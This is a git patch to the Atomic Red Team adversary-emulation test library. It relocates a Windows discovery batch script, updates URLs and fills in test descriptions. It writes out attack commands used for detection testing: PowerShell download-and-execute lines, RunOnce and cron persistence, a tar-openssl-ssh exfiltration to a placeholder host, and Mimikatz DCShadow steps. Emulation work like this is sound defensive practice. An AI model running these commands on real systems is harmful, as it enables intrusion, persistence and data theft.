(#397) * Discovery and Cleanup * Generate docs from job=validate_atomics_generate_docs branch=Discovery * mv discovery.bat * Fixed Discovery.bat URLs Updated Techniques with new location of discovery.bat * Generate docs from job=validate_atomics_generate_docs branch=Discovery --- .../chain_reaction_Argonaut.ps1 | 4 +- .../chain_reaction_Plutonium.bat | 2 +- .../chain_reaction_Reactor.bat | 2 +- ARTifacts/Labs/Webinar11062017-Labs.bat | 2 +- ARTifacts/Misc/Discovery.bat | 44 ++++++ atomics/T1002/T1002.md | 6 +- atomics/T1014/T1014.md | 19 +-- atomics/T1022/T1022.md | 2 +- atomics/T1030/T1030.md | 5 - atomics/T1048/T1048.md | 7 + atomics/T1060/T1060.md | 2 +- atomics/T1060/T1060.yaml | 2 +- atomics/T1074/T1074.md | 2 +- atomics/T1074/T1074.yaml | 2 +- atomics/T1105/T1105.md | 8 +- atomics/T1105/T1105.yaml | 2 +- atomics/T1150/T1150.md | 2 +- atomics/T1158/T1158.md | 26 +++- atomics/T1158/T1158.yaml | 14 +- atomics/T1160/T1160.md | 2 +- atomics/T1168/T1168.md | 4 +- atomics/T1183/T1183.md | 6 +- atomics/T1207/T1207.md | 5 - atomics/index.md | 17 +- atomics/index.yaml | 145 ++++++++++-------- atomics/linux-index.md | 9 +- atomics/macos-index.md | 8 +- atomics/windows-index.md | 8 +- 28 files changed, 204 insertions(+), 153 deletions(-) create mode 100644 ARTifacts/Misc/Discovery.bat diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 b/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 index 41f06a24..ddafcdf5 100644 --- a/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 +++ b/ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1 @@ -8,11 +8,11 @@ $temp = $env:temp # Note that these are alias' for Invoke-WebRequest. # The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc) -wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat +wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat # Alternate Ending: Using curl -curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat +curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat # Execute the 1.bat file diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat b/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat index 428d246d..4dd5317b 100644 --- a/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat +++ b/ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat @@ -16,7 +16,7 @@ SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:http :: Execution: https://attack.mitre.org/wiki/Technique/T1086 :: Have PowerShell download the Discovery.bat, output to a local file (for review later) -powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt :: Tactic: Credential Access :: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136 diff --git a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat index d2ec8167..2989138c 100644 --- a/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat +++ b/ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat @@ -36,7 +36,7 @@ tasklist.exe | findstr defender :: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086 :: Technique: Multiple Discovery -powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" +powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" :: Tactic: Collection :: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119 diff --git a/ARTifacts/Labs/Webinar11062017-Labs.bat b/ARTifacts/Labs/Webinar11062017-Labs.bat index 0ae3cfec..92012140 100644 --- a/ARTifacts/Labs/Webinar11062017-Labs.bat +++ b/ARTifacts/Labs/Webinar11062017-Labs.bat @@ -22,7 +22,7 @@ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-t :: Step 2. This payload will execute an discovery sequence T1087 :: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" +:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser diff --git a/ARTifacts/Misc/Discovery.bat b/ARTifacts/Misc/Discovery.bat new file mode 100644 index 00000000..8c51854a --- /dev/null +++ b/ARTifacts/Misc/Discovery.bat @@ -0,0 +1,44 @@ +net user Administrator /domain +net Accounts +net localgroup administrators +net use +net share +net group "domain admins" /domain +net config workstation +net accounts +net accounts /domain +net view +sc query +reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices +reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit +reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run +wmic useraccount list +wmic useraccount get /ALL +wmic startup list brief +wmic share list +wmic service get name,displayname,pathname,startmode +wmic process list brief +wmic process get caption,executablepath,commandline +wmic qfe get description,installedOn /format:csv +arp -a +whoami +ipconfig /displaydns +route print +netsh advfirewall show allprofiles +systeminfo +qwinsta +quser diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md index e6209d92..4b2ecb85 100644 --- a/atomics/T1002/T1002.md +++ b/atomics/T1002/T1002.md @@ -24,7 +24,7 @@ Requires Network: No
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell -TODO +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration **Supported Platforms:** Windows @@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
## Atomic Test #2 - Compress Data for Exfiltration With Rar -TODO +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration **Supported Platforms:** Windows @@ -62,7 +62,7 @@ rar a -r #{output_file} #{input_file}
## Atomic Test #3 - Data Compressed - nix -TODO +An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration **Supported Platforms:** Linux, macOS diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 3e0b9147..dfaa6352 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -20,9 +20,7 @@ Permissions Required: Administrator, SYSTEM, root - [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit) -- [Atomic Test #3 - LD_PRELOAD based Rootkit](#atomic-test-3---ld_preload-based-rootkit) - -- [Atomic Test #4 - Windows Signed Driver Rootkit Test](#atomic-test-4---windows-signed-driver-rootkit-test) +- [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test)
@@ -63,20 +61,7 @@ sudo modprobe #{rootkit_file}

-## Atomic Test #3 - LD_PRELOAD based Rootkit -LD_PRELOAD based Rootkit - -**Supported Platforms:** Linux - - -#### Run it with `sh`! -``` -export LD_PRELOAD=$PWD/#{rootkit_file} -``` -
-
- -## Atomic Test #4 - Windows Signed Driver Rootkit Test +## Atomic Test #3 - Windows Signed Driver Rootkit Test This test exploits a signed driver to execute code in Kernel. SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 We leverage the work done here: diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index 25a4bc38..82a32bfc 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md @@ -24,7 +24,7 @@ Requires Network: No
## Atomic Test #1 - Data Encrypted -TODO +Encrypt data for exiltration **Supported Platforms:** macOS, CentOS, Ubuntu, Linux diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 62aba7e9..0d13ddf2 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -23,11 +23,6 @@ Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Inputs -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| output_file | TODO | todo | TODO| - #### Run it with `sh`! ``` cd /tmp/ diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 45ec39ba..01d7c654 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -51,6 +51,13 @@ Local to Remote **Supported Platforms:** macOS, CentOS, Ubuntu, Linux +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domain | target SSH domain | url | target.example.com| +| user_name | username for domain | string | atomic| +| password | password for user | string | atomic| + #### Run it with `sh`! ``` tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc' diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md index f0768a39..45069557 100644 --- a/atomics/T1060/T1060.md +++ b/atomics/T1060/T1060.md @@ -79,7 +79,7 @@ RunOnce Key Persistence via PowerShell #### Run it with `powershell`! ``` $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"' +set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force ```
diff --git a/atomics/T1060/T1060.yaml b/atomics/T1060/T1060.yaml index 764e5ea8..d647065d 100644 --- a/atomics/T1060/T1060.yaml +++ b/atomics/T1060/T1060.yaml @@ -56,7 +56,7 @@ atomic_tests: name: powershell command: | $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force - name: Startup Folder description: | diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index cd71c93a..bb9b4431 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file #### Run it with `powershell`! ``` -"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log +"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log ```
diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml index 10e3dd56..3b92608b 100644 --- a/atomics/T1074/T1074.yaml +++ b/atomics/T1074/T1074.yaml @@ -13,4 +13,4 @@ atomic_tests: executor: name: powershell command: | - "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log + "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 00436463..73a586fe 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -18,20 +18,20 @@ Requires Network: Yes ## Atomic Tests -- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx) +- [Atomic Test #1 - rsync - scp - sftp remote file copy](#atomic-test-1---rsync---scp---sftp-remote-file-copy)
-## Atomic Test #1 - xxxx -xxxx +## Atomic Test #1 - rsync - scp - sftp remote file copy +Utilize rsync, scp and sftp to perform a remote file copy **Supported Platforms:** Linux, macOS #### Run it with `bash`! ``` -### TODO: Not sure how to handle commands that need to be run on multiple systems +### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 431ba313..36f0a948 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -12,7 +12,7 @@ atomic_tests: executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + ### FIX: Not sure how to handle commands that need to be run on multiple systems # Adversary System Configuration # Ensure SSH access has been configured for an adversary account diff --git a/atomics/T1150/T1150.md b/atomics/T1150/T1150.md index 01edcb32..6e0fd347 100644 --- a/atomics/T1150/T1150.md +++ b/atomics/T1150/T1150.md @@ -23,7 +23,7 @@ Permissions Required: User, Administrator
## Atomic Test #1 - Plist Modification -TODO +Modify MacOS plist file in one of two directories **Supported Platforms:** macOS diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md index b4536727..e6b50f68 100644 --- a/atomics/T1158/T1158.md +++ b/atomics/T1158/T1158.md @@ -41,7 +41,7 @@ Permissions Required: User - [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files) -- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories) +- [Atomic Test #7 - Create Visible Directories](#atomic-test-7---create-visible-directories) - [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files) @@ -67,7 +67,7 @@ echo "this file is hidden" > .hidden-directory/.hidden-file
## Atomic Test #2 - Mac Hidden file -TODO +Hide a file on MacOS **Supported Platforms:** macOS @@ -99,11 +99,16 @@ mv #{filename} .#{output_filename}
## Atomic Test #4 - Hidden files -Requieres Apple Dev Tools +Requires Apple Dev Tools **Supported Platforms:** macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| filename | path of file to hide | path | /tmp/evil| + #### Run it with `sh`! ``` setfile -a V #{filename} @@ -112,11 +117,16 @@ setfile -a V #{filename}
## Atomic Test #5 - Hide a Directory -xxx +Hide a directory on MacOS **Supported Platforms:** macOS +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| filename | path of file to hide | path | /tmp/evil| + #### Run it with `sh`! ``` chflags hidden #{filename} @@ -125,7 +135,7 @@ chflags hidden #{filename}
## Atomic Test #6 - Show all hidden files -xxx +Show all hidden files on MacOS **Supported Platforms:** macOS @@ -137,8 +147,8 @@ defaults write com.apple.finder AppleShowAllFiles YES

-## Atomic Test #7 - Create visible Directories -xxx +## Atomic Test #7 - Create Visible Directories +Create visible directories on MacOS and Linux **Supported Platforms:** macOS, Linux @@ -154,7 +164,7 @@ ls visible-directory
## Atomic Test #8 - Create hidden directories and files -xxx +Create hidden directories and files on Nix platforms **Supported Platforms:** macOS, Linux diff --git a/atomics/T1158/T1158.yaml b/atomics/T1158/T1158.yaml index 912aae16..a02bff7b 100644 --- a/atomics/T1158/T1158.yaml +++ b/atomics/T1158/T1158.yaml @@ -51,11 +51,15 @@ atomic_tests: - name: Hidden files description: | - Requieres Apple Dev Tools + Requires Apple Dev Tools supported_platforms: - macos - + input_arguments: + filename: + description: path of file to hide + type: path + default: /tmp/evil executor: name: sh command: | @@ -67,7 +71,11 @@ atomic_tests: supported_platforms: - macos - + input_arguments: + filename: + description: path of file to hide + type: path + default: /tmp/evil executor: name: sh command: | diff --git a/atomics/T1160/T1160.md b/atomics/T1160/T1160.md index 5ce8e8b1..de83827a 100644 --- a/atomics/T1160/T1160.md +++ b/atomics/T1160/T1160.md @@ -24,7 +24,7 @@ Permissions Required: Administrator
## Atomic Test #1 - Launch Daemon -TODO +Utilize LaunchDaemon to launch `Hello World` **Supported Platforms:** macOS diff --git a/atomics/T1168/T1168.md b/atomics/T1168/T1168.md index 00743284..2b074f8a 100644 --- a/atomics/T1168/T1168.md +++ b/atomics/T1168/T1168.md @@ -36,7 +36,7 @@ Contributors: Anastasios Pingios
## Atomic Test #1 - Cron Job -TODO +Set a cron job **Supported Platforms:** macOS, CentOS, Ubuntu, Linux @@ -54,7 +54,7 @@ echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
## Atomic Test #2 - Cron Job -TODO +Manually set a cron job **Supported Platforms:** macOS, CentOS, Ubuntu, Linux diff --git a/atomics/T1183/T1183.md b/atomics/T1183/T1183.md index 63306fbd..6ca7caa3 100644 --- a/atomics/T1183/T1183.md +++ b/atomics/T1183/T1183.md @@ -22,13 +22,13 @@ Permissions Required: Administrator, SYSTEM - [Atomic Test #1 - IFEO Add Debugger](#atomic-test-1---ifeo-add-debugger) -- [Atomic Test #2 - IFEO GLobal Flags](#atomic-test-2---ifeo-global-flags) +- [Atomic Test #2 - IFEO Global Flags](#atomic-test-2---ifeo-global-flags)
## Atomic Test #1 - IFEO Add Debugger -TODO +Leverage Global Flags Settings **Supported Platforms:** Windows @@ -46,7 +46,7 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution

-## Atomic Test #2 - IFEO GLobal Flags +## Atomic Test #2 - IFEO Global Flags Leverage Global Flags Settings **Supported Platforms:** Windows diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index a8c4d756..3cb2724e 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -40,11 +40,6 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller **Supported Platforms:** Windows -#### Inputs -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| output_file | TODO | todo | TODO| - #### Run it with these steps! 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM. 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes. diff --git a/atomics/index.md b/atomics/index.md index ed22d00e..bbc18901 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -45,7 +45,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - Atomic Test #9: Create ADS command prompt [windows] - Atomic Test #10: Create ADS PowerShell [windows] @@ -55,7 +55,7 @@ - Atomic Test #1: Installing Hyper-V Feature [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -191,7 +191,7 @@ - Atomic Test #4: Hidden files [macos] - Atomic Test #5: Hide a Directory [macos] - Atomic Test #6: Show all hidden files [macos] - - Atomic Test #7: Create visible Directories [macos, linux] + - Atomic Test #7: Create Visible Directories [macos, linux] - Atomic Test #8: Create hidden directories and files [macos, linux] - Atomic Test #9: Create ADS command prompt [windows] - Atomic Test #10: Create ADS PowerShell [windows] @@ -200,7 +200,7 @@ - T1143 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1070 Indicator Removal on Host](./T1070/T1070.md) @@ -253,8 +253,7 @@ - [T1014 Rootkit](./T1014/T1014.md) - Atomic Test #1: Loadable Kernel Module based Rootkit [linux] - Atomic Test #2: Loadable Kernel Module based Rootkit [linux] - - Atomic Test #3: LD_PRELOAD based Rootkit [linux] - - Atomic Test #4: Windows Signed Driver Rootkit Test [windows] + - Atomic Test #3: Windows Signed Driver Rootkit Test [windows] - [T1085 Rundll32](./T1085/T1085.md) - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows] - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -304,7 +303,7 @@ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows] - [T1183 Image File Execution Options Injection](./T1183/T1183.md) - Atomic Test #1: IFEO Add Debugger [windows] - - Atomic Test #2: IFEO GLobal Flags [windows] + - Atomic Test #2: IFEO Global Flags [windows] - [T1160 Launch Daemon](./T1160/T1160.md) - Atomic Test #1: Launch Daemon [macos] - [T1050 New Service](./T1050/T1050.md) @@ -557,7 +556,7 @@ - [T1076 Remote Desktop Protocol](./T1076/T1076.md) - Atomic Test #1: RDP [windows] - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -638,7 +637,7 @@ - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1105 Remote File Copy](./T1105/T1105.md) - - Atomic Test #1: xxxx [linux, macos] + - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos] - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/index.yaml b/atomics/index.yaml index 1674ea9c..05d74bf6 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -1125,7 +1125,7 @@ persistence: mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file - name: Mac Hidden file - description: 'TODO + description: 'Hide a file on MacOS ' supported_platforms: @@ -1158,29 +1158,39 @@ persistence: ' - name: Hidden files - description: 'Requieres Apple Dev Tools + description: 'Requires Apple Dev Tools ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'setfile -a V #{filename} ' - name: Hide a Directory - description: 'xxx + description: 'Hide a directory on MacOS ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'chflags hidden #{filename} ' - name: Show all hidden files - description: 'xxx + description: 'Show all hidden files on MacOS ' supported_platforms: @@ -1190,8 +1200,8 @@ persistence: command: 'defaults write com.apple.finder AppleShowAllFiles YES ' - - name: Create visible Directories - description: 'xxx + - name: Create Visible Directories + description: 'Create visible directories on MacOS and Linux ' supported_platforms: @@ -1205,7 +1215,7 @@ persistence: ls ls visible-directory - name: Create hidden directories and files - description: 'xxx + description: 'Create hidden directories and files on Nix platforms ' supported_platforms: @@ -1550,7 +1560,7 @@ persistence: identifier: T1183 atomic_tests: - name: IFEO Add Debugger - description: 'TODO + description: 'Leverage Global Flags Settings ' supported_platforms: @@ -1570,7 +1580,7 @@ persistence: File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" ' - - name: IFEO GLobal Flags + - name: IFEO Global Flags description: 'Leverage Global Flags Settings ' @@ -1780,7 +1790,7 @@ persistence: identifier: T1160 atomic_tests: - name: Launch Daemon - description: 'TODO + description: 'Utilize LaunchDaemon to launch `Hello World` ' supported_platforms: @@ -1963,7 +1973,7 @@ persistence: identifier: T1168 atomic_tests: - name: Cron Job - description: 'TODO + description: 'Set a cron job ' supported_platforms: @@ -1982,7 +1992,7 @@ persistence: ' - name: Cron Job - description: 'TODO + description: 'Manually set a cron job ' supported_platforms: @@ -2595,7 +2605,7 @@ persistence: identifier: T1150 atomic_tests: - name: Plist Modification - description: 'TODO + description: 'Modify MacOS plist file in one of two directories ' supported_platforms: @@ -2839,7 +2849,7 @@ persistence: name: powershell command: | $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" - set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"' + set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"' Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force - name: Startup Folder description: 'Add Shortcut To Startup via PowerShell @@ -4238,11 +4248,6 @@ defense-evasion: [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html) supported_platforms: - windows - input_arguments: - output_file: - description: TODO - type: todo - default: TODO executor: name: manual steps: | @@ -4983,7 +4988,7 @@ defense-evasion: mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file - name: Mac Hidden file - description: 'TODO + description: 'Hide a file on MacOS ' supported_platforms: @@ -5016,29 +5021,39 @@ defense-evasion: ' - name: Hidden files - description: 'Requieres Apple Dev Tools + description: 'Requires Apple Dev Tools ' supported_platforms: - macos + input_arguments: + filename: + description: path of file to hide + type: path + default: "/tmp/evil" executor: name: sh command: 'setfile -a V #{filename} ' - name: Hide a Directory - description: 'xxx + description: 'Hide a 